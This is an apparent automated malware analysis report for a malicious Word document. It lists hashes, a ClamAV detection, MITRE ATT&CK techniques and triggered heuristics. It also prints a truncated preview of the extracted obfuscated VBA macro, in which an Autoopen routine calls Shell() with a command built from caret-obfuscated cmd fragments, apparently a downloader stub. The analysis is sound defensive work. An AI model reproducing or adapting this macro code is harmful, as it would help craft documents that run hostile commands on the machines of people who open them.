Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8c1195973cc97a31…

MALICIOUS

Office (OLE)

97.8 KB Created: 2018-06-04 12:44:00 Authoring application: Microsoft Office Word First seen: 2019-04-17
MD5: a94da67c15dd32940721041dddafc486 SHA-1: 685b174a920b66999b88796494bbcee249c3231a SHA-256: 8c1195973cc97a312e247d3f18441b5188134f85fe04fde608229bb27dc9b909
Risk Score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The Autoopen subroutine triggers the execution of a shell command, which is highly indicative of downloader or dropper functionality. The macro's obfuscation and the presence of a Shell() call suggest it is designed to fetch and execute a secondary payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6578629-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6578629-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  18076 bytes
SHA-256: 52db9b90e6da99066eeaf358fcefd3a9b9c1be4077cfc3f5fed9a4e0b47e6584
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "DbTAiYloZzmu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ahbFTYD()
On Error Resume Next
For OfTswp = opKsRw To 30475
         FtBZI = (nUjms - ChrW(14360 * 33928) * YiIMf * CInt(TChCP + Sqr(74898)) + 83975 - 21322 / 87641 - CDate(iFPoVl - 59426 + 86375 - Hex(oaKmFE / 65412)) + (jRcjE * Tan(JlDMz)))
Next
For VNcbF = mrdmm To 6580
         brfIP = (zhbKtQ - ChrW(83984 * 57294) * FCRZfi * CInt(azjhB + Sqr(34748)) + 81069 - 65832 / 89476 - CDate(ZTdZid - 76159 + 70904 - Hex(cuCjK / 26641)) + (zmbUNY * Tan(LQhYia)))
Next
ahbFTYD = HalhShlkRbR + Shell(pMEhBRbK + Chr(qdiEFPZI + vbKeyC + iiOGmPsm) + hzAivtXzN + jzcwnhuAWr + lzHrhH + KsCUYtnW + lrdbbXw + lOJuuwmYWFj + tuGuLUkZ, PluSm + 0 + IbNdtEBw)
For rtQOrY = PbZio To 56253
         VYOZT = (UEHaSB - ChrW(73351 * 35006) * wEFKW * CInt(BmUSpa + Sqr(65612)) + 20563 - 3784 / 81002 - CDate(ubpsS - 97729 + 29064 - Hex(Lnlqwq / 73479)) + (GiUZdG * Tan(UmuHd)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For mtFjt = KcQiG To 80719
         LwPwY = (DsbjhQ - ChrW(89882 * 77052) * VFYrl * CInt(YtjGCk + Sqr(52627)) + 11117 - 80549 / 220 - CDate(jSvVE - 80782 + 41681 - Hex(aIKNXT / 97753)) + (DGKFO * Tan(NmFiq)))
Next
ahbFTYD
For rbmlj = hcslR To 30468
         LKqNj = (nDSXz - ChrW(59577 * 89381) * iFJQVz * CInt(owWZj + Sqr(7523)) + 72234 - 42891 / 49136 - CDate(pvCCu - 44276 + 47592 - Hex(ZCRYE / 75158)) + (lUCXj * Tan(vPCWL)))
Next
End Sub


Attribute VB_Name = "ozFBhtFKjr"
Function hzAivtXzN()
On Error Resume Next
For JpQNAs = RTJBj To 401
         diwHL = (nzaAKE - ChrW(21509 * 66084) * wRXvN * CInt(Rkkbb + Sqr(19304)) + 46571 - 4732 / 35718 - CDate(ikWjC - 27178 + 71431 - Hex(lpJPP / 6094)) + (joQWsi * Tan(moMwOf)))
Next
qMskQX = "md WtdSC" + "ibhsch TstcAoCJ" + "wNFwEShPQi o" + "fiwf" + "Aq"
For pPzHzj = owwij To 10837
         YCBUh = (uVHfaY - ChrW(86340 * 96193) * XEzFjv * CInt(MHSWb + Sqr(84935)) + 80889 - 33536 / 77778 - CDate(YaOmK - 56251 + 63690 - Hex(qTHRhZ / 75879)) + (Hbuib * Tan(OwpuC)))
Next
pLUBbJ = "jcHC &    " + " %^c^o^m^" + "S^p^E^c^%" + "    " + " %" + "^c^" + "o^m^S^p^E^c" + "^%     /V " + "       " + " /c           s"
For ECfqr = zSjuM To 51911
         FqcRv = (sjFlPW - ChrW(10731 * 70171) * LPzQa * CInt(unoRa + Sqr(34842)) + 50045 - 40318 / 73945 - CDate(OTQVh - 74129 + 63661 - Hex(TKbzRQ / 37821)) + (izGTzw * Tan(vLDoA)))
Next
iJGpTjjYXcC = "et %NLzHM" + "JoWj" + "FiCZj" + "Y%=wLtRcu" + "HTn"
For ISOTY = CpPSZ To 66666
         zQvvW = (zpnaO - ChrW(35969 * 27994) * TUKiw * CInt(ZKrMjs + Sqr(29713)) + 32207 - 92693 / 29519 - CDate(hluzkA - 31024 + 62796 - Hex(CfVrA / 748)) + (jjUEn * Tan(BdmYiO)))
Next
oCwNWuwd = "J&&set %h" + "uHojGaa" + "AJGAPS" + "%=p&&set %om" + "AzmVbC" + "aQJXvN%" + "=o" + "^w&&s" + "et %wzA"
For IhsYuj = TSjTuz To 65757
         upzMfi = (hbKsHj - ChrW(34021 * 23698) * RBCHV * CInt(wzUSqQ + Sqr(1143)) + 2140 - 20690 / 80473 - CDate(WizZWi - 91748 + 54251 - Hex(RNBYw / 4033)) + (XBsva * Tan(HsBsN)))
Next
HpNuSNql = "wV" + "hSuzuzwGYb%=wU" + "KdIQ" + "GfrViqaT&&set " + "%QCbZHpB" + "B%=" + "!%huHojGa" + "aAJGAPS%!" + "&&set %Ed"
For PjazDO = jOmvS To 13417
         VUiwvU = (KczSuS - ChrW(25308 * 51285) * XdVDM * CInt(rOzJl + Sqr(36643)) + 83282 - 72441 / 11724 - CDate(ouonJF - 94423 + 85779 - Hex(EDahI / 93823)) + (IKORwD * Tan(BdUwl)))
Next
BBtJDsAXQRj = "UCNqWkjzk" + "fjdV" + "%=EVpiwmJ&&" + "set" + " %fHhbhMOZj" + "wKvTN%=e^r" + "&&set %"
hzAivtXzN = qMskQX + pLUBbJ + iJGpTjjYXcC + oCwNWuwd + HpNuSNql + BBtJDsAXQRj
End Function
Function jzcwnhuAWr()
On Error Resume Next
For VTrtrG = YnuSj To 55810
         IPQjp = (mKhWo - ChrW(56151 * 71632) * nJpGLJ * CInt(lMhpCZ + Sqr(51781)) + 40136 - 29111 / 93608 - CDate(TCKlMo - 17893 + 46188 - Hex(KmUEOU / 92119)) + (dFLUTS * Tan(Diqno)))
Next
iFOMGhq = "BqG" + "VBqOzbUhB%=!%o" + "mAzmVb" + 
... (truncated)